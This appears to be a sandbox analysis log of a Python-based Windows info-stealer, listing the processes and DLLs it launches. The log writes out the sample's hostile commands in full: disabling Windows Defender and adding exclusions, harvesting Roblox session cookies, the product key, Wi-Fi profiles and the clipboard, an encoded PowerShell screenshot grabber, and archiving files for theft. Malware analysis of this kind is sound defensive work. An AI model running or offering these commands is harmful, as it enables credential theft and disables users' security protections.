Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: python3.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: libffi-8.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: libcrypto-1_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: libssl-1_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: dciman32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: avrt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: audioses.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
